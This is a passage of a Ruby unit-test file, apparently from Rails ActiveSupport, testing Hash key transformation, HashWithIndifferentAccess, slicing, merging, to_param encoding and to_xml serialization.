assert_respond_to h, :transform_keys
assert_respond_to h, :transform_keys!
assert_respond_to h, :deep_transform_keys
assert_respond_to h, :deep_transform_keys!
assert_respond_to h, :symbolize_keys
assert_respond_to h, :symbolize_keys!
assert_respond_to h, :deep_symbolize_keys
assert_respond_to h, :deep_symbolize_keys!
assert_respond_to h, :stringify_keys
assert_respond_to h, :stringify_keys!
assert_respond_to h, :deep_stringify_keys
assert_respond_to h, :deep_stringify_keys!
assert_respond_to h, :to_options
assert_respond_to h, :to_options!
end
def test_transform_keys
assert_equal @upcase_strings, @strings.transform_keys{ |key| key.to_s.upcase }
assert_equal @upcase_strings, @symbols.transform_keys{ |key| key.to_s.upcase }
assert_equal @upcase_strings, @mixed.transform_keys{ |key| key.to_s.upcase }
end
def test_transform_keys_not_mutates
transformed_hash = @mixed.dup
transformed_hash.transform_keys{ |key| key.to_s.upcase }
assert_equal @mixed, transformed_hash
end
def test_deep_transform_keys
assert_equal @nested_upcase_strings, @nested_symbols.deep_transform_keys{ |key| key.to_s.upcase }
assert_equal @nested_upcase_strings, @nested_strings.deep_transform_keys{ |key| key.to_s.upcase }
assert_equal @nested_upcase_strings, @nested_mixed.deep_transform_keys{ |key| key.to_s.upcase }
end
def test_deep_transform_keys_not_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_transform_keys{ |key| key.to_s.upcase }
assert_equal @nested_mixed, transformed_hash
end
def test_transform_keys!
assert_equal @upcase_strings, @symbols.dup.transform_keys!{ |key| key.to_s.upcase }
assert_equal @upcase_strings, @strings.dup.transform_keys!{ |key| key.to_s.upcase }
assert_equal @upcase_strings, @mixed.dup.transform_keys!{ |key| key.to_s.upcase }
end
def test_transform_keys_with_bang_mutates
transformed_hash = @mixed.dup
transformed_hash.transform_keys!{ |key| key.to_s.upcase }
assert_equal @upcase_strings, transformed_hash
assert_equal @mixed, { :a => 1, "b" => 2 }
end
def test_deep_transform_keys!
assert_equal @nested_upcase_strings, @nested_symbols.deep_dup.deep_transform_keys!{ |key| key.to_s.upcase }
assert_equal @nested_upcase_strings, @nested_strings.deep_dup.deep_transform_keys!{ |key| key.to_s.upcase }
assert_equal @nested_upcase_strings, @nested_mixed.deep_dup.deep_transform_keys!{ |key| key.to_s.upcase }
end
def test_deep_transform_keys_with_bang_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_transform_keys!{ |key| key.to_s.upcase }
assert_equal @nested_upcase_strings, transformed_hash
assert_equal @nested_mixed, { 'a' => { :b => { 'c' => 3 } } }
end
def test_symbolize_keys
assert_equal @symbols, @symbols.symbolize_keys
assert_equal @symbols, @strings.symbolize_keys
assert_equal @symbols, @mixed.symbolize_keys
end
def test_symbolize_keys_not_mutates
transformed_hash = @mixed.dup
transformed_hash.symbolize_keys
assert_equal @mixed, transformed_hash
end
def test_deep_symbolize_keys
assert_equal @nested_symbols, @nested_symbols.deep_symbolize_keys
assert_equal @nested_symbols, @nested_strings.deep_symbolize_keys
assert_equal @nested_symbols, @nested_mixed.deep_symbolize_keys
end
def test_deep_symbolize_keys_not_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_symbolize_keys
assert_equal @nested_mixed, transformed_hash
end
def test_symbolize_keys!
assert_equal @symbols, @symbols.dup.symbolize_keys!
assert_equal @symbols, @strings.dup.symbolize_keys!
assert_equal @symbols, @mixed.dup.symbolize_keys!
end
def test_symbolize_keys_with_bang_mutates
transformed_hash = @mixed.dup
transformed_hash.deep_symbolize_keys!
assert_equal @symbols, transformed_hash
assert_equal @mixed, { :a => 1, "b" => 2 }
end
def test_deep_symbolize_keys!
assert_equal @nested_symbols, @nested_symbols.deep_dup.deep_symbolize_keys!
assert_equal @nested_symbols, @nested_strings.deep_dup.deep_symbolize_keys!
assert_equal @nested_symbols, @nested_mixed.deep_dup.deep_symbolize_keys!
end
def test_deep_symbolize_keys_with_bang_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_symbolize_keys!
assert_equal @nested_symbols, transformed_hash
assert_equal @nested_mixed, { 'a' => { :b => { 'c' => 3 } } }
end
def test_symbolize_keys_preserves_keys_that_cant_be_symbolized
assert_equal @illegal_symbols, @illegal_symbols.symbolize_keys
assert_equal @illegal_symbols, @illegal_symbols.dup.symbolize_keys!
end
def test_deep_symbolize_keys_preserves_keys_that_cant_be_symbolized
assert_equal @nested_illegal_symbols, @nested_illegal_symbols.deep_symbolize_keys
assert_equal @nested_illegal_symbols, @nested_illegal_symbols.deep_dup.deep_symbolize_keys!
end
def test_symbolize_keys_preserves_fixnum_keys
assert_equal @fixnums, @fixnums.symbolize_keys
assert_equal @fixnums, @fixnums.dup.symbolize_keys!
end
def test_deep_symbolize_keys_preserves_fixnum_keys
assert_equal @nested_fixnums, @nested_fixnums.deep_symbolize_keys
assert_equal @nested_fixnums, @nested_fixnums.deep_dup.deep_symbolize_keys!
end
def test_stringify_keys
assert_equal @strings, @symbols.stringify_keys
assert_equal @strings, @strings.stringify_keys
assert_equal @strings, @mixed.stringify_keys
end
def test_stringify_keys_not_mutates
transformed_hash = @mixed.dup
transformed_hash.stringify_keys
assert_equal @mixed, transformed_hash
end
def test_deep_stringify_keys
assert_equal @nested_strings, @nested_symbols.deep_stringify_keys
assert_equal @nested_strings, @nested_strings.deep_stringify_keys
assert_equal @nested_strings, @nested_mixed.deep_stringify_keys
end
def test_deep_stringify_keys_not_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_stringify_keys
assert_equal @nested_mixed, transformed_hash
end
def test_stringify_keys!
assert_equal @strings, @symbols.dup.stringify_keys!
assert_equal @strings, @strings.dup.stringify_keys!
assert_equal @strings, @mixed.dup.stringify_keys!
end
def test_stringify_keys_with_bang_mutates
transformed_hash = @mixed.dup
transformed_hash.stringify_keys!
assert_equal @strings, transformed_hash
assert_equal @mixed, { :a => 1, "b" => 2 }
end
def test_deep_stringify_keys!
assert_equal @nested_strings, @nested_symbols.deep_dup.deep_stringify_keys!
assert_equal @nested_strings, @nested_strings.deep_dup.deep_stringify_keys!
assert_equal @nested_strings, @nested_mixed.deep_dup.deep_stringify_keys!
end
def test_deep_stringify_keys_with_bang_mutates
transformed_hash = @nested_mixed.deep_dup
transformed_hash.deep_stringify_keys!
assert_equal @nested_strings, transformed_hash
assert_equal @nested_mixed, { 'a' => { :b => { 'c' => 3 } } }
end
def test_symbolize_keys_for_hash_with_indifferent_access
assert_instance_of Hash, @symbols.with_indifferent_access.symbolize_keys
assert_equal @symbols, @symbols.with_indifferent_access.symbolize_keys
assert_equal @symbols, @strings.with_indifferent_access.symbolize_keys
assert_equal @symbols, @mixed.with_indifferent_access.symbolize_keys
end
def test_deep_symbolize_keys_for_hash_with_indifferent_access
assert_instance_of Hash, @nested_symbols.with_indifferent_access.deep_symbolize_keys
assert_equal @nested_symbols, @nested_symbols.with_indifferent_access.deep_symbolize_keys
assert_equal @nested_symbols, @nested_strings.with_indifferent_access.deep_symbolize_keys
assert_equal @nested_symbols, @nested_mixed.with_indifferent_access.deep_symbolize_keys
end
def test_symbolize_keys_bang_for_hash_with_indifferent_access
assert_raise(NoMethodError) { @symbols.with_indifferent_access.dup.symbolize_keys! }
assert_raise(NoMethodError) { @strings.with_indifferent_access.dup.symbolize_keys! }
assert_raise(NoMethodError) { @mixed.with_indifferent_access.dup.symbolize_keys! }
end
def test_deep_symbolize_keys_bang_for_hash_with_indifferent_access
assert_raise(NoMethodError) { @nested_symbols.with_indifferent_access.deep_dup.deep_symbolize_keys! }
assert_raise(NoMethodError) { @nested_strings.with_indifferent_access.deep_dup.deep_symbolize_keys! }
assert_raise(NoMethodError) { @nested_mixed.with_indifferent_access.deep_dup.deep_symbolize_keys! }
end
def test_symbolize_keys_preserves_keys_that_cant_be_symbolized_for_hash_with_indifferent_access
assert_equal @illegal_symbols, @illegal_symbols.with_indifferent_access.symbolize_keys
assert_raise(NoMethodError) { @illegal_symbols.with_indifferent_access.dup.symbolize_keys! }
end
def test_deep_symbolize_keys_preserves_keys_that_cant_be_symbolized_for_hash_with_indifferent_access
assert_equal @nested_illegal_symbols, @nested_illegal_symbols.with_indifferent_access.deep_symbolize_keys
assert_raise(NoMethodError) { @nested_illegal_symbols.with_indifferent_access.deep_dup.deep_symbolize_keys! }
end
def test_symbolize_keys_preserves_fixnum_keys_for_hash_with_indifferent_access
assert_equal @fixnums, @fixnums.with_indifferent_access.symbolize_keys
assert_raise(NoMethodError) { @fixnums.with_indifferent_access.dup.symbolize_keys! }
end
def test_deep_symbolize_keys_preserves_fixnum_keys_for_hash_with_indifferent_access
assert_equal @nested_fixnums, @nested_fixnums.with_indifferent_access.deep_symbolize_keys
assert_raise(NoMethodError) { @nested_fixnums.with_indifferent_access.deep_dup.deep_symbolize_keys! }
end
def test_stringify_keys_for_hash_with_indifferent_access
assert_instance_of ActiveSupport::HashWithIndifferentAccess, @symbols.with_indifferent_access.stringify_keys
assert_equal @strings, @symbols.with_indifferent_access.stringify_keys
assert_equal @strings, @strings.with_indifferent_access.stringify_keys
assert_equal @strings, @mixed.with_indifferent_access.stringify_keys
end
def test_deep_stringify_keys_for_hash_with_indifferent_access
assert_instance_of ActiveSupport::HashWithIndifferentAccess, @nested_symbols.with_indifferent_access.deep_stringify_keys
assert_equal @nested_strings, @nested_symbols.with_indifferent_access.deep_stringify_keys
assert_equal @nested_strings, @nested_strings.with_indifferent_access.deep_stringify_keys
assert_equal @nested_strings, @nested_mixed.with_indifferent_access.deep_stringify_keys
end
def test_stringify_keys_bang_for_hash_with_indifferent_access
assert_instance_of ActiveSupport::HashWithIndifferentAccess, @symbols.with_indifferent_access.dup.stringify_keys!
assert_equal @strings, @symbols.with_indifferent_access.dup.stringify_keys!
assert_equal @strings, @strings.with_indifferent_access.dup.stringify_keys!
assert_equal @strings, @mixed.with_indifferent_access.dup.stringify_keys!
end
def test_deep_stringify_keys_bang_for_hash_with_indifferent_access
assert_instance_of ActiveSupport::HashWithIndifferentAccess, @nested_symbols.with_indifferent_access.dup.deep_stringify_keys!
assert_equal @nested_strings, @nested_symbols.with_indifferent_access.deep_dup.deep_stringify_keys!
assert_equal @nested_strings, @nested_strings.with_indifferent_access.deep_dup.deep_stringify_keys!
assert_equal @nested_strings, @nested_mixed.with_indifferent_access.deep_dup.deep_stringify_keys!
end
def test_nested_under_indifferent_access
foo = { "foo" => SubclassingHash.new.tap { |h| h["bar"] = "baz" } }.with_indifferent_access
assert_kind_of ActiveSupport::HashWithIndifferentAccess, foo["foo"]
foo = { "foo" => NonIndifferentHash.new.tap { |h| h["bar"] = "baz" } }.with_indifferent_access
assert_kind_of NonIndifferentHash, foo["foo"]
foo = { "foo" => IndifferentHash.new.tap { |h| h["bar"] = "baz" } }.with_indifferent_access
assert_kind_of IndifferentHash, foo["foo"]
end
def test_indifferent_assorted
@strings = @strings.with_indifferent_access
@symbols = @symbols.with_indifferent_access
@mixed = @mixed.with_indifferent_access
assert_equal 'a', @strings.__send__(:convert_key, :a)
assert_equal 1, @strings.fetch('a')
assert_equal 1, @strings.fetch(:a.to_s)
assert_equal 1, @strings.fetch(:a)
hashes = { :@strings => @strings, :@symbols => @symbols, :@mixed => @mixed }
method_map = { :'[]' => 1, :fetch => 1, :values_at => [1],
:has_key? => true, :include? => true, :key? => true,
:member? => true }
hashes.each do |name, hash|
method_map.sort_by { |m| m.to_s }.each do |meth, expected|
assert_equal(expected, hash.__send__(meth, 'a'),
"Calling #{name}.#{meth} 'a'")
assert_equal(expected, hash.__send__(meth, :a),
"Calling #{name}.#{meth} :a")
end
end
assert_equal [1, 2], @strings.values_at('a', 'b')
assert_equal [1, 2], @strings.values_at(:a, :b)
assert_equal [1, 2], @symbols.values_at('a', 'b')
assert_equal [1, 2], @symbols.values_at(:a, :b)
assert_equal [1, 2], @mixed.values_at('a', 'b')
assert_equal [1, 2], @mixed.values_at(:a, :b)
end
def test_indifferent_reading
hash = HashWithIndifferentAccess.new
hash["a"] = 1
hash["b"] = true
hash["c"] = false
hash["d"] = nil
assert_equal 1, hash[:a]
assert_equal true, hash[:b]
assert_equal false, hash[:c]
assert_equal nil, hash[:d]
assert_equal nil, hash[:e]
end
def test_indifferent_reading_with_nonnil_default
hash = HashWithIndifferentAccess.new(1)
hash["a"] = 1
hash["b"] = true
hash["c"] = false
hash["d"] = nil
assert_equal 1, hash[:a]
assert_equal true, hash[:b]
assert_equal false, hash[:c]
assert_equal nil, hash[:d]
assert_equal 1, hash[:e]
end
def test_indifferent_writing
hash = HashWithIndifferentAccess.new
hash[:a] = 1
hash['b'] = 2
hash[3] = 3
assert_equal hash['a'], 1
assert_equal hash['b'], 2
assert_equal hash[:a], 1
assert_equal hash[:b], 2
assert_equal hash[3], 3
end
def test_indifferent_update
hash = HashWithIndifferentAccess.new
hash[:a] = 'a'
hash['b'] = 'b'
updated_with_strings = hash.update(@strings)
updated_with_symbols = hash.update(@symbols)
updated_with_mixed = hash.update(@mixed)
assert_equal updated_with_strings[:a], 1
assert_equal updated_with_strings['a'], 1
assert_equal updated_with_strings['b'], 2
assert_equal updated_with_symbols[:a], 1
assert_equal updated_with_symbols['b'], 2
assert_equal updated_with_symbols[:b], 2
assert_equal updated_with_mixed[:a], 1
assert_equal updated_with_mixed['b'], 2
assert [updated_with_strings, updated_with_symbols, updated_with_mixed].all? { |h| h.keys.size == 2 }
end
def test_indifferent_merging
hash = HashWithIndifferentAccess.new
hash[:a] = 'failure'
hash['b'] = 'failure'
other = { 'a' => 1, :b => 2 }
merged = hash.merge(other)
assert_equal HashWithIndifferentAccess, merged.class
assert_equal 1, merged[:a]
assert_equal 2, merged['b']
hash.update(other)
assert_equal 1, hash[:a]
assert_equal 2, hash['b']
end
def test_indifferent_replace
hash = HashWithIndifferentAccess.new
hash[:a] = 42
replaced = hash.replace(b: 12)
assert hash.key?('b')
assert !hash.key?(:a)
assert_equal 12, hash[:b]
assert_same hash, replaced
end
def test_indifferent_merging_with_block
hash = HashWithIndifferentAccess.new
hash[:a] = 1
hash['b'] = 3
other = { 'a' => 4, :b => 2, 'c' => 10 }
merged = hash.merge(other) { |key, old, new| old > new ? old : new }
assert_equal HashWithIndifferentAccess, merged.class
assert_equal 4, merged[:a]
assert_equal 3, merged['b']
assert_equal 10, merged[:c]
other_indifferent = HashWithIndifferentAccess.new('a' => 9, :b => 2)
merged = hash.merge(other_indifferent) { |key, old, new| old + new }
assert_equal HashWithIndifferentAccess, merged.class
assert_equal 10, merged[:a]
assert_equal 5, merged[:b]
end
def test_indifferent_reverse_merging
hash = HashWithIndifferentAccess.new('some' => 'value', 'other' => 'value')
hash.reverse_merge!(:some => 'noclobber', :another => 'clobber')
assert_equal 'value', hash[:some]
assert_equal 'clobber', hash[:another]
end
def test_indifferent_deleting
get_hash = proc{ { :a => 'foo' }.with_indifferent_access }
hash = get_hash.call
assert_equal hash.delete(:a), 'foo'
assert_equal hash.delete(:a), nil
hash = get_hash.call
assert_equal hash.delete('a'), 'foo'
assert_equal hash.delete('a'), nil
end
def test_indifferent_select
hash = ActiveSupport::HashWithIndifferentAccess.new(@strings).select {|k,v| v == 1}
assert_equal({ 'a' => 1 }, hash)
assert_instance_of ActiveSupport::HashWithIndifferentAccess, hash
end
def test_indifferent_select_bang
indifferent_strings = ActiveSupport::HashWithIndifferentAccess.new(@strings)
indifferent_strings.select! {|k,v| v == 1}
assert_equal({ 'a' => 1 }, indifferent_strings)
assert_instance_of ActiveSupport::HashWithIndifferentAccess, indifferent_strings
end
def test_indifferent_reject
hash = ActiveSupport::HashWithIndifferentAccess.new(@strings).reject {|k,v| v != 1}
assert_equal({ 'a' => 1 }, hash)
assert_instance_of ActiveSupport::HashWithIndifferentAccess, hash
end
def test_indifferent_reject_bang
indifferent_strings = ActiveSupport::HashWithIndifferentAccess.new(@strings)
indifferent_strings.reject! {|k,v| v != 1}
assert_equal({ 'a' => 1 }, indifferent_strings)
assert_instance_of ActiveSupport::HashWithIndifferentAccess, indifferent_strings
end
def test_indifferent_to_hash
# Should convert to a Hash with String keys.
assert_equal @strings, @mixed.with_indifferent_access.to_hash
# Should preserve the default value.
mixed_with_default = @mixed.dup
mixed_with_default.default = '1234'
roundtrip = mixed_with_default.with_indifferent_access.to_hash
assert_equal @strings, roundtrip
assert_equal '1234', roundtrip.default
new_to_hash = @nested_mixed.with_indifferent_access.to_hash
assert_not new_to_hash.instance_of?(HashWithIndifferentAccess)
assert_not new_to_hash["a"].instance_of?(HashWithIndifferentAccess)
assert_not new_to_hash["a"]["b"].instance_of?(HashWithIndifferentAccess)
end
def test_lookup_returns_the_same_object_that_is_stored_in_hash_indifferent_access
hash = HashWithIndifferentAccess.new {|h, k| h[k] = []}
hash[:a] << 1
assert_equal [1], hash[:a]
end
def test_with_indifferent_access_has_no_side_effects_on_existing_hash
hash = {content: [{:foo => :bar, 'bar' => 'baz'}]}
hash.with_indifferent_access
assert_equal [:foo, "bar"], hash[:content].first.keys
end
def test_indifferent_hash_with_array_of_hashes
hash = { "urls" => { "url" => [ { "address" => "1" }, { "address" => "2" } ] }}.with_indifferent_access
assert_equal "1", hash[:urls][:url].first[:address]
hash = hash.to_hash
assert_not hash.instance_of?(HashWithIndifferentAccess)
assert_not hash["urls"].instance_of?(HashWithIndifferentAccess)
assert_not hash["urls"]["url"].first.instance_of?(HashWithIndifferentAccess)
end
def test_should_preserve_array_subclass_when_value_is_array
array = SubclassingArray.new
array << { "address" => "1" }
hash = { "urls" => { "url" => array }}.with_indifferent_access
assert_equal SubclassingArray, hash[:urls][:url].class
end
def test_should_preserve_array_class_when_hash_value_is_frozen_array
array = SubclassingArray.new
array << { "address" => "1" }
hash = { "urls" => { "url" => array.freeze }}.with_indifferent_access
assert_equal SubclassingArray, hash[:urls][:url].class
end
def test_stringify_and_symbolize_keys_on_indifferent_preserves_hash
h = HashWithIndifferentAccess.new
h[:first] = 1
h = h.stringify_keys
assert_equal 1, h['first']
h = HashWithIndifferentAccess.new
h['first'] = 1
h = h.symbolize_keys
assert_equal 1, h[:first]
end
def test_deep_stringify_and_deep_symbolize_keys_on_indifferent_preserves_hash
h = HashWithIndifferentAccess.new
h[:first] = 1
h = h.deep_stringify_keys
assert_equal 1, h['first']
h = HashWithIndifferentAccess.new
h['first'] = 1
h = h.deep_symbolize_keys
assert_equal 1, h[:first]
end
def test_to_options_on_indifferent_preserves_hash
h = HashWithIndifferentAccess.new
h['first'] = 1
h.to_options!
assert_equal 1, h['first']
end
def test_indifferent_subhashes
h = {'user' => {'id' => 5}}.with_indifferent_access
['user', :user].each {|user| [:id, 'id'].each {|id| assert_equal 5, h[user][id], "h[#{user.inspect}][#{id.inspect}] should be 5"}}
h = {:user => {:id => 5}}.with_indifferent_access
['user', :user].each {|user| [:id, 'id'].each {|id| assert_equal 5, h[user][id], "h[#{user.inspect}][#{id.inspect}] should be 5"}}
end
def test_indifferent_duplication
# Should preserve default value
h = HashWithIndifferentAccess.new
h.default = '1234'
assert_equal h.default, h.dup.default
# Should preserve class for subclasses
h = IndifferentHash.new
assert_equal h.class, h.dup.class
end
def test_assert_valid_keys
assert_nothing_raised do
{ :failure => "stuff", :funny => "business" }.assert_valid_keys([ :failure, :funny ])
{ :failure => "stuff", :funny => "business" }.assert_valid_keys(:failure, :funny)
end
assert_raise(ArgumentError, "Unknown key: failore") do
{ :failore => "stuff", :funny => "business" }.assert_valid_keys([ :failure, :funny ])
{ :failore => "stuff", :funny => "business" }.assert_valid_keys(:failure, :funny)
end
end
def test_assorted_keys_not_stringified
original = {Object.new => 2, 1 => 2, [] => true}
indiff = original.with_indifferent_access
assert(!indiff.keys.any? {|k| k.kind_of? String}, "A key was converted to a string!")
end
def test_deep_merge
hash_1 = { :a => "a", :b => "b", :c => { :c1 => "c1", :c2 => "c2", :c3 => { :d1 => "d1" } } }
hash_2 = { :a => 1, :c => { :c1 => 2, :c3 => { :d2 => "d2" } } }
expected = { :a => 1, :b => "b", :c => { :c1 => 2, :c2 => "c2", :c3 => { :d1 => "d1", :d2 => "d2" } } }
assert_equal expected, hash_1.deep_merge(hash_2)
hash_1.deep_merge!(hash_2)
assert_equal expected, hash_1
end
def test_deep_merge_with_block
hash_1 = { :a => "a", :b => "b", :c => { :c1 => "c1", :c2 => "c2", :c3 => { :d1 => "d1" } } }
hash_2 = { :a => 1, :c => { :c1 => 2, :c3 => { :d2 => "d2" } } }
expected = { :a => [:a, "a", 1], :b => "b", :c => { :c1 => [:c1, "c1", 2], :c2 => "c2", :c3 => { :d1 => "d1", :d2 => "d2" } } }
assert_equal(expected, hash_1.deep_merge(hash_2) { |k,o,n| [k, o, n] })
hash_1.deep_merge!(hash_2) { |k,o,n| [k, o, n] }
assert_equal expected, hash_1
end
def test_deep_merge_on_indifferent_access
hash_1 = HashWithIndifferentAccess.new({ :a => "a", :b => "b", :c => { :c1 => "c1", :c2 => "c2", :c3 => { :d1 => "d1" } } })
hash_2 = HashWithIndifferentAccess.new({ :a => 1, :c => { :c1 => 2, :c3 => { :d2 => "d2" } } })
hash_3 = { :a => 1, :c => { :c1 => 2, :c3 => { :d2 => "d2" } } }
expected = { "a" => 1, "b" => "b", "c" => { "c1" => 2, "c2" => "c2", "c3" => { "d1" => "d1", "d2" => "d2" } } }
assert_equal expected, hash_1.deep_merge(hash_2)
assert_equal expected, hash_1.deep_merge(hash_3)
hash_1.deep_merge!(hash_2)
assert_equal expected, hash_1
end
def test_store_on_indifferent_access
hash = HashWithIndifferentAccess.new
hash.store(:test1, 1)
hash.store('test1', 11)
hash[:test2] = 2
hash['test2'] = 22
expected = { "test1" => 11, "test2" => 22 }
assert_equal expected, hash
end
def test_constructor_on_indifferent_access
hash = HashWithIndifferentAccess[:foo, 1]
assert_equal 1, hash[:foo]
assert_equal 1, hash['foo']
hash[:foo] = 3
assert_equal 3, hash[:foo]
assert_equal 3, hash['foo']
end
def test_reverse_merge
defaults = { :a => "x", :b => "y", :c => 10 }.freeze
options = { :a => 1, :b => 2 }
expected = { :a => 1, :b => 2, :c => 10 }
# Should merge defaults into options, creating a new hash.
assert_equal expected, options.reverse_merge(defaults)
assert_not_equal expected, options
# Should merge! defaults into options, replacing options.
merged = options.dup
assert_equal expected, merged.reverse_merge!(defaults)
assert_equal expected, merged
# Should be an alias for reverse_merge!
merged = options.dup
assert_equal expected, merged.reverse_update(defaults)
assert_equal expected, merged
end
def test_slice
original = { :a => 'x', :b => 'y', :c => 10 }
expected = { :a => 'x', :b => 'y' }
# Should return a new hash with only the given keys.
assert_equal expected, original.slice(:a, :b)
assert_not_equal expected, original
end
def test_slice_inplace
original = { :a => 'x', :b => 'y', :c => 10 }
expected = { :c => 10 }
# Should replace the hash with only the given keys.
assert_equal expected, original.slice!(:a, :b)
end
def test_slice_with_an_array_key
original = { :a => 'x', :b => 'y', :c => 10, [:a, :b] => "an array key" }
expected = { [:a, :b] => "an array key", :c => 10 }
# Should return a new hash with only the given keys when given an array key.
assert_equal expected, original.slice([:a, :b], :c)
assert_not_equal expected, original
end
def test_slice_inplace_with_an_array_key
original = { :a => 'x', :b => 'y', :c => 10, [:a, :b] => "an array key" }
expected = { :a => 'x', :b => 'y' }
# Should replace the hash with only the given keys when given an array key.
assert_equal expected, original.slice!([:a, :b], :c)
end
def test_slice_with_splatted_keys
original = { :a => 'x', :b => 'y', :c => 10, [:a, :b] => "an array key" }
expected = { :a => 'x', :b => "y" }
# Should grab each of the splatted keys.
assert_equal expected, original.slice(*[:a, :b])
end
def test_indifferent_slice
original = { :a => 'x', :b => 'y', :c => 10 }.with_indifferent_access
expected = { :a => 'x', :b => 'y' }.with_indifferent_access
[['a', 'b'], [:a, :b]].each do |keys|
# Should return a new hash with only the given keys.
assert_equal expected, original.slice(*keys), keys.inspect
assert_not_equal expected, original
end
end
def test_indifferent_slice_inplace
original = { :a => 'x', :b => 'y', :c => 10 }.with_indifferent_access
expected = { :c => 10 }.with_indifferent_access
[['a', 'b'], [:a, :b]].each do |keys|
# Should replace the hash with only the given keys.
copy = original.dup
assert_equal expected, copy.slice!(*keys)
end
end
def test_indifferent_slice_access_with_symbols
original = {'login' => 'bender', 'password' => 'shiny', 'stuff' => 'foo'}
original = original.with_indifferent_access
slice = original.slice(:login, :password)
assert_equal 'bender', slice[:login]
assert_equal 'bender', slice['login']
end
def test_extract
original = {:a => 1, :b => 2, :c => 3, :d => 4}
expected = {:a => 1, :b => 2}
remaining = {:c => 3, :d => 4}
assert_equal expected, original.extract!(:a, :b, :x)
assert_equal remaining, original
end
def test_extract_nils
original = {:a => nil, :b => nil}
expected = {:a => nil}
extracted = original.extract!(:a, :x)
assert_equal expected, extracted
assert_equal nil, extracted[:a]
assert_equal nil, extracted[:x]
end
def test_indifferent_extract
original = {:a => 1, 'b' => 2, :c => 3, 'd' => 4}.with_indifferent_access
expected = {:a => 1, :b => 2}.with_indifferent_access
remaining = {:c => 3, :d => 4}.with_indifferent_access
[['a', 'b'], [:a, :b]].each do |keys|
copy = original.dup
assert_equal expected, copy.extract!(*keys)
assert_equal remaining, copy
end
end
def test_except
original = { :a => 'x', :b => 'y', :c => 10 }
expected = { :a => 'x', :b => 'y' }
# Should return a new hash without the given keys.
assert_equal expected, original.except(:c)
assert_not_equal expected, original
# Should replace the hash without the given keys.
assert_equal expected, original.except!(:c)
assert_equal expected, original
end
def test_except_with_more_than_one_argument
original = { :a => 'x', :b => 'y', :c => 10 }
expected = { :a => 'x' }
assert_equal expected, original.except(:b, :c)
end
def test_except_with_original_frozen
original = { :a => 'x', :b => 'y' }
original.freeze
assert_nothing_raised { original.except(:a) }
end
def test_except_with_mocha_expectation_on_original
original = { :a => 'x', :b => 'y' }
original.expects(:delete).never
original.except(:a)
end
end
class IWriteMyOwnXML
def to_xml(options = {})
options[:indent] ||= 2
xml = options[:builder] ||= Builder::XmlMarkup.new(:indent => options[:indent])
xml.instruct! unless options[:skip_instruct]
xml.level_one do
xml.tag!(:second_level, 'content')
end
end
end
class HashExtToParamTests < ActiveSupport::TestCase
class ToParam < String
def to_param
"#{self}-1"
end
end
def test_string_hash
assert_equal '', {}.to_param
assert_equal 'hello=world', { :hello => "world" }.to_param
assert_equal 'hello=10', { "hello" => 10 }.to_param
assert_equal 'hello=world&say_bye=true', {:hello => "world", "say_bye" => true}.to_param
end
def test_number_hash
assert_equal '10=20&30=40&50=60', {10 => 20, 30 => 40, 50 => 60}.to_param
end
def test_to_param_hash
assert_equal 'custom-1=param-1&custom2-1=param2-1', {ToParam.new('custom') => ToParam.new('param'), ToParam.new('custom2') => ToParam.new('param2')}.to_param
end
def test_to_param_hash_escapes_its_keys_and_values
assert_equal 'param+1=A+string+with+%2F+characters+%26+that+should+be+%3F+escaped', { 'param 1' => 'A string with / characters & that should be ? escaped' }.to_param
end
def test_to_param_orders_by_key_in_ascending_order
assert_equal 'a=2&b=1&c=0', Hash[*%w(b 1 c 0 a 2)].to_param
end
end
class HashToXmlTest < ActiveSupport::TestCase
def setup
@xml_options = { :root => :person, :skip_instruct => true, :indent => 0 }
end
def test_one_level
xml = { :name => "David", :street => "Paulina" }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street>Paulina</street>))
assert xml.include?(%(<name>David</name>))
end
def test_one_level_dasherize_false
xml = { :name => "David", :street_name => "Paulina" }.to_xml(@xml_options.merge(:dasherize => false))
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street_name>Paulina</street_name>))
assert xml.include?(%(<name>David</name>))
end
def test_one_level_dasherize_true
xml = { :name => "David", :street_name => "Paulina" }.to_xml(@xml_options.merge(:dasherize => true))
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street-name>Paulina</street-name>))
assert xml.include?(%(<name>David</name>))
end
def test_one_level_camelize_true
xml = { :name => "David", :street_name => "Paulina" }.to_xml(@xml_options.merge(:camelize => true))
assert_equal "<Person>", xml.first(8)
assert xml.include?(%(<StreetName>Paulina</StreetName>))
assert xml.include?(%(<Name>David</Name>))
end
def test_one_level_camelize_lower
xml = { :name => "David", :street_name => "Paulina" }.to_xml(@xml_options.merge(:camelize => :lower))
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<streetName>Paulina</streetName>))
assert xml.include?(%(<name>David</name>))
end
def test_one_level_with_types
xml = { :name => "David", :street => "Paulina", :age => 26, :age_in_millis => 820497600000, :moved_on => Date.new(2005, 11, 15), :resident => :yes }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street>Paulina</street>))
assert xml.include?(%(<name>David</name>))
assert xml.include?(%(<age type="integer">26</age>))
assert xml.include?(%(<age-in-millis type="integer">820497600000</age-in-millis>))
assert xml.include?(%(<moved-on type="date">2005-11-15</moved-on>))
assert xml.include?(%(<resident type="symbol">yes</resident>))
end
def test_one_level_with_nils
xml = { :name => "David", :street => "Paulina", :age => nil }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street>Paulina</street>))
assert xml.include?(%(<name>David</name>))
assert xml.include?(%(<age nil="true"/>))
end
def test_one_level_with_skipping_types
xml = { :name => "David", :street => "Paulina", :age => nil }.to_xml(@xml_options.merge(:skip_types => true))
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street>Paulina</street>))
assert xml.include?(%(<name>David</name>))
assert xml.include?(%(<age nil="true"/>))
end
def test_one_level_with_yielding
xml = { :name => "David", :street => "Paulina" }.to_xml(@xml_options) do |x|
x.creator("Rails")
end
assert_equal "<person>", xml.first(8)
assert xml.include?(%(<street>Paulina</street>))
assert xml.include?(%(<name>David</name>))
assert xml.include?(%(<creator>Rails</creator>))
end
def test_two_levels
xml = { :name => "David", :address => { :street => "Paulina" } }.to_xml(@xml_options)
assert_equal "<person>", xml.first(8)
